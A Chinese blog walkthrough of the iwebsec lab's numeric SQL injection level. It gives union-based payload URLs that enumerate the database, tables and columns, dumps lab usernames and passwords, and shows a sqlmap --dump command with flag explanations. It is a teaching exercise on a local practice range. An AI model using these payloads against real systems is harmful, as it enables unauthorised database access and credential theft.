[iwebsec]sql注入-数字型

最新推荐文章于 2024-07-24 14:28:41 发布
最新推荐文章于 2024-07-24 14:28:41 发布
阅读量277 收藏 2
点赞数
文章标签: sql oracle 数据库 php java 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45965246/article/details/132941933
版权

简介

image-20220427111551703

手工注入

首先访问我们的靶场环境:http://192.168.30.171

接着访问sql注入漏洞>01-数字型注入

image-20220427111846700

靶场环境

image-20220427111933111

发现漏洞

使用hackbar或者直接在url地址栏当输入单引号’%27

这里我选择使用hackbar会比较方便一点

可以看到,我们输入的单引号直接被带入到语句当中执行了,导致我们的页面中直接返回了sql错误的信息。

image-20220427202223789

这种直接被带入执行的语句是很危险的,因为这个地方可以由用户自定义恶意的sql代码,从而对数据库进行窃取、破坏、安装后门等一系列的破坏数据库的行为

漏洞复现

既然我们已经发现漏洞,我们就需要对漏洞进行复现,从而熟悉黑客攻击的过程以便于我们后期更好地进行有效的防护

获取数据库名

我们可以构造恶意的sql语句获取当前的数据库名字

判断当前表的字段数量,这里可以通过二分查找法快速确定

攻击代码如下:

#成功判断字段数量为3
http://192.168.30.171/sqli/01.php?id=3 order by 3
#通过联合查询查看可以回显的字段,回显的地方一共有3个
http://192.168.30.171/sqli/01.php?id=-3 union select 1,2,3
#通过回显的地方查看数据路径,操作系统
http://192.168.30.171/sqli/01.php?id=-3 union select @@datadir,@@version_compile_os,3

image-20220427204506726

#获取当前数据库的名字
http://192.168.30.171/sqli/01.php?id=-3 union select database(),2,3

image-20220427204838374

获取数据库的表名

获取到数据库名之后,可以查看有多少表,有什么表,最后筛选出来有什么表是具有价值的,比如:admin、users、config、data类似名字

攻击代码如下:

http://192.168.30.171/sqli/01.php?id=-3 union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()

查看出来有:sqli,user,users,xss

目前看来有直接价值的是user,users这两个表

image-20220427205344901

获取user和users表的字段名

查看users表中的字段

攻击代码如下:

http://192.168.30.171/sqli/01.php?id=-3 union select table_schema, table_name, group_concat(column_name) from information_schema.columns where table_name='users'

image-20220428104625424

users表的字段有:username,password,role

查看user表中的字段

攻击代码如下:

http://192.168.30.171/sqli/01.php?id=-3 union select table_schema, table_name, group_concat(column_name) from 
information_schema.columns where table_name='user'#只是将这个地方修改为user即可

image-20220428104835812

user表的字段有:id,username,password

读取这两个表中的数据

要时刻记住我们的最终目的就是信息,也就是数据,得数据者得天下!

从上面的结果来看,对我们来说有用的字段也就是比较显眼的username和password,只要得到这两个字段中的数据我们就可以使用任意用户进行登录

获取users表中的数据

攻击代码如下:

http://192.168.30.171/sqli/01.php?id=-3 union select username,password,3 from users --+

image-20220428105345706

这个表中只有一条数据,username:orange,password:mall123mall

注:这里提醒一下,由于实际场景中的数据量是很庞大的,不应该直接像上面那样直接将数据回显出来,应该对这些数据进行限制输出处理也就使用limit关键字

获取user表中的数据

攻击代码如下:

http://192.168.30.171/sqli/01.php?id=-3 union select username,password,3 from user --+

image-20220428110034618

这个表中一共有三条数据

idnameage
user1pass13
user2pass23
user3pass33

到这里,整个漏洞复现也就结束了,当然绝对不仅限于上面,这些都只是最基础最基础的内容。其实只要像上面这种什么权限都有已经属于高危漏洞了,实际场景当中都是存在有waf进行防御,也就是说即使代码没有过滤,也很难绕过这些waf。

使用sqlmap进行注入

实际场景中,如果使用手工确定一处存在漏洞,我们便可以直接把它丢到sqlmap就行了,很少会像上面那样使用繁琐的方式获取信息。上面也仅仅只是用于了解原理进行学习。

获取user表中的数据

sqlmap -u "http://192.168.30.171/sqli/01.php?id=3" --batch -D iwebsec -T user -C username,password --dump

image-20220428111659537

 +----------+----------+
 | username | password |
 +----------+----------+
 | user1    | pass1    |
 | user2    | pass2    |
 | user3    | pass3    |
 +----------+----------+

跟我们手工注入获取的信息是一样的,上面的命令都是已知数据库、表名、字段

如果不知道数据库、表名、字段情况下也是不能获取数据的,下面一些参数就可以起到信息收集的作用了。最后使用dump出来就行了。

sqlmap参数:

–dbs 列举数据库

–current-db 当前数据库

–tables 列举数据库的表名

–columns 列举表的字段名

–dump 列举表中的数据

-D 指定数据库

-T 指定表

-C 指定字段,可用逗号,进行分割

呆宝宝不呆哦~
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
iwebsec--sql注入--数字型注入题解
别打扰我摸鱼
07-25 126
iwebsec-sql注入第一关数字型注入题解
iwebsec靶场 解析漏洞通关笔记1-Apache解析漏洞
mooyuan的博客
04-28 1237
Apache服务器在解析一个文件时,当文件有多个以点分隔的后缀时,如果右边的后缀无法识别(不在mime.types内),则继续从右向左识别,那么我们请求这样一个文件:ljn.php.aaa,遇到第一个扩展名 aaa ->发现无法识别,于是从右向左 识别第二个扩展名php -> 发现后缀是php可以识别,于是交给php 处理。
iwebsec--sql注入漏洞
追求卓越,技术流~
11-20 1481
sql注入漏洞
CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入
lvx++的博客
01-22 3310
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。 一、解题过程 用到的工具:Chrome浏览器和HackerBar插件 (一)题目概览 1.题目路径 2.HackerBar使用 3.测试结果集列数为3列 ?id=1 order by 4 4.给id传递-1再用union select查询自己想要的数据 (1)取得当前应用的数据库名 ?id=-1 union sele
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入
mooyuan的博客
11-25 2226
iwebsec靶场的SQL注入关卡共13关SQL注入漏洞,覆盖了数字型注入、字符型注入、报错型盲注、布尔型盲注、时间型盲注以及各种过滤绕过的注入,外加上二次注入,是SQL注入知识点覆盖较为全面的一个靶场。SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第一关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的数字型关卡无过滤任何信息。
iwebsec sql-bool注入
Enrich_Life的博客
11-01 409
查询正确输出welcome to iwebsec ,查询错误输出1,总的是数字型注入,所以还是可以用数字型注入判断是否存在注入。接下来就是爆数据库名,由于是bool注入只有两种回显,所以只能一个一个字符猜,用ascii码猜。回显了三个welcome to iwebsec 说明存在数字型注入。回显成功 数据库长度七位。我们得知第一个表长度为4。由上图可知,有4个表。
iwebsec sql数字型注入
Enrich_Life的博客
10-30 247
参数无过滤,直接注入即可。
iwebsec靶场SQL注入漏洞-数字型注入
qq_56041380的博客
03-23 325
group_concat()是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。information_schema数据库存储了SCHEMATA表,TABLES表和COLUMNS表。information_schema数据库是MYSQL自带的数据库,它提供访问数据库元数据的方式。我们可以看到当前数据库的表有sqli,user,users,xss。当把order by 里的数字加到4列时显示。测试3列结果还是显示正常。
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2166
iwebsec靶场,SQL注入篇,详细过程,全篇完结
SQL 数字型注入详解 + iwebsec实例
m0_50917178的博客
12-04 6337
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL 数字型注入原理二、使用步骤1.引入库2.读入数据总结 前言 本文为作者的学习笔记。其中详细记载了作者对于SQL 数字型注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsec和Webgoat两个平台来进行实战。如果有不足之处,欢迎指正。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL 数字型注入原理 当输入的参数为整型时例如:ID、年龄等。如果此时存在注入漏洞,
sql注入之数字型注入
08-02
SQL 注入之数字型注入 SQL 注入之数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQL注入-概述-ppt.pptx
10-27
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)进行数据存储和检索的Web应用程序。这种攻击方式利用了程序设计中的漏洞,使得恶意用户能够通过输入特定的SQL代码,来操纵数据库,获取未经授权...
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
09-sql注入-mssql1
08-03
SQL Server是由美国微软公司推出的关系型数据库管理系统,它以其高性能、高可扩展性以及与Windows NT系统的深度融合而受到广泛应用。SQL Server不仅提供了强大的事务处理能力,确保了数据的完整性,还支持对称多...
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 801
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
SQL进阶:解锁高级特性,深化数据洞察
最新发布
WayneYalejk的博客
07-24 389
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 257
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值